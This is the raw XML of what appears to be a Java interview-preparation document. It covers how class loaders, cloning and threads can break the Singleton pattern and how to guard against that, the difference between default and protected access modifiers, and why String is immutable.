    <w:p w14:paraId="172913A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DE3E5E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AF8A36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3FA11B8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AAE3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0E50DA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493C5F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9DE2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360CE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1 = new MyClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28275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2 = new MyClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978382C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640FAD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ad Singleton using two different class loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885A5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1 = classLoader1.loadClass("Singleton");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C43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2 = classLoader2.loadClass("Singleton");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC387C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0FA63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 singletonClass1.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02687C8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ingletonClass2.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DF3C6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FDDD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2C4D3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Different instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B2E1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5076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3987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by using multiple class loaders, you could potentially load different instances of the Singleton class, breaking the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD1EF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loning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A79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class implements Cloneable, the clone() method can be used to create a new instance, which breaks the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30EFD6"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6DC9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Cloneable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA799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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A68372" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140D89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651785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5E83AAC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3A8A92" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE308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CD4E9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F165A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797349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C8E1B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B87FC0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DD5F02" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599292D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718F8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throws CloneNotSupportedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44036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clone();  // Allows cloning, which breaks Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3E5F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8B2C45" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2E3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CloneNotSupportedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0F8A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1F41097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152DC4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508984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1.clone();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B1F8D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34A34C1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A998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D05FA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overriding the clone() method and allowing cloning, you can create a new instance of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F174EF"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Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641FDFA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implementation is not thread-safe, it is possible for multiple threads to create multiple instances of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4A413"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A737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5F0A32F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25516640" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECC74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490B9E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7F38EC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E4F172" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0F7D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C5818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AB85ED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E1C74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48E1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DBB537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7D805A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B1D6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71B81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1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B011F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0AAEE34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72515EC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ADBF2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2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BF4E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getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EBCF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E476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AC528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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E605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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CCC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44B682F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CADAE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D3CD12"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ction, Serialization, and Multiple Class Loaders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can all break the Singleton pattern by creating multiple instances of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EFD37"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on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Safety issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also break the Singleton pattern if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4DA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prevent breaking the Singleton pattern, you can implement the following safeguards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C4CF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readResolve() method to handle serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200F86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cloning by overriding the clone() method and throwing CloneNotSupportedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4606AC"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 thread-safety using synchronization or volatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7AAF01"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reflection access to the constructor by throwing an exception in the constructor if an instance already exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750892F" w14:textId="2858791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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB3CF5" w14:textId="622E65AD" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA7204">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc197867271"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="002C3B85" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between default and protected access modifier</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="59D6ECEA" w14:textId="15EFE91E" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ccess modifiers determine the visibility or accessibility of classes, methods, variables, and constructors. Both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s provide different levels of access within different scopes. Here’s a comparison between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BC50B"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ault Access Modifier (Package-Private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D31062"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ccess modifier, also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>package-private</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, is the access level when no modifier is specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28743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The member is accessible only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It cannot be accessed from classes outside the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE478F"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f a class has a default access modifier, subclasses in the same package can access it. However, subclasses in different packages cannot access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BDE9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C661B31"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242E21A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  // default access modifier (package-private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF0C38"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148B6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135883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MyClass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB7D250"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0C3E9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C95C6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7E9BA18"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only accessible within the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C952827"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access num or show() from another package, a compilation error will occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51321631"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otected Access Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A2E38"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 allows access to the member from the same package and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including subclasses in different packages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BDAB6"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A member marked as protected is accessible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A22CB7"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309A55F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subclasses (even if they are in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0339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other classes 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5327889C"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Subclasses can inherit and access protected members from the parent class, even if they are in a different package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0AC54"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ACFDC5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23440C6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int num;  // protected access modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CCAB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19E5FD"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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298D90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Parent class");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAAB4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96C14"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541854" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3618EB"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hild extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66D75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076135D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  // Accessible because it's inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B939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ow();  // Accessible because it's inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A8FF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B24E8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7B49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FB86BB5"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accessible from the Child class because Child is a subclass of Parent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109034E"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Child were in a different package from Parent, num and show() would still be accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D08740"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970"/>
        <w:gridCol w:w="4657"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="2B3DE9C4" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E179C4"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009340A"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Package-Private)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1E2352"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ected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="23E1E440" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="013DD7C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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C8AA888"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only within the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>same package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7043B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xml:space="preserve"> and by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even if in different packages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="2904C33A" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BFE23E6"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subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB3EE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ccessible outside the package, even in subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44CA895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ible by subclasses (same package or different package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="437DB45C" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C2470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562B07B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are not inherited by subclasses in other packages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD4F31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can be inherited by subclasses (same package or different package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="569D9D46" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="487CF77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D2DE24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used when you want to limit access to the package scope only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="644F708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want to allow access to subclasses (even in other packages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77A76E47"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D3E908D"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Package-Private)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when you want a class or member to be accessible only within the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C6DAE"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is used when you want the class or member to be accessible within the same package and by subclasses, even if they are in different packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB1E2E" w14:textId="211779C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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C470FEE" w14:textId="1355CF93" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="007150EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc197867272"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is string immutable</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="44601B90" w14:textId="1C9591CF" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B380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s why String is immutable in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7205A6"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curity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F8C58" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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objects are often used in security-sensitive operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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aching and Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104BC2E"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xml:space="preserve"> is a technique in Java that helps save memory by reusing existing string objects rather than creating new ones every time a string is encountered.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the "String Literal Pool") stores string literals in a special pool to avoid redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3DE92"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trings are immutable, they can be used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys in hash-based collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like HashMap, HashSet, etc., because their hash codes remain constant throughout their existence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B92C4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hread Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3ED71"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objects are inherently thread-safe.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This means that multiple threads can safely access a String object without any synchronization needed because the value of the String cannot be modified after it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18DF7F"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multi-threaded applications, the immutability of Strings guarantees that no thread can change the value of a String object, thus avoiding concurrency issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42BDA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mplicity and Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41720063"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t makes the code </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because any operations that involve strings will always yield the same result for the same input values, reducing errors in string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC8A08"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Hashing Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73782813" w14:textId="77777777" w:rsidR="00745110" w:rsidRPr="00CE4B95" w:rsidRDefault="00745110" w:rsidP="000B3808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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s are widely used in hash-based collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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mutability and Optimized Memory Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA73A4"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icularly important when dealing with large amounts of text data, where memory efficiency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCDBAE"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848D5C"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Immutability {</w:t>
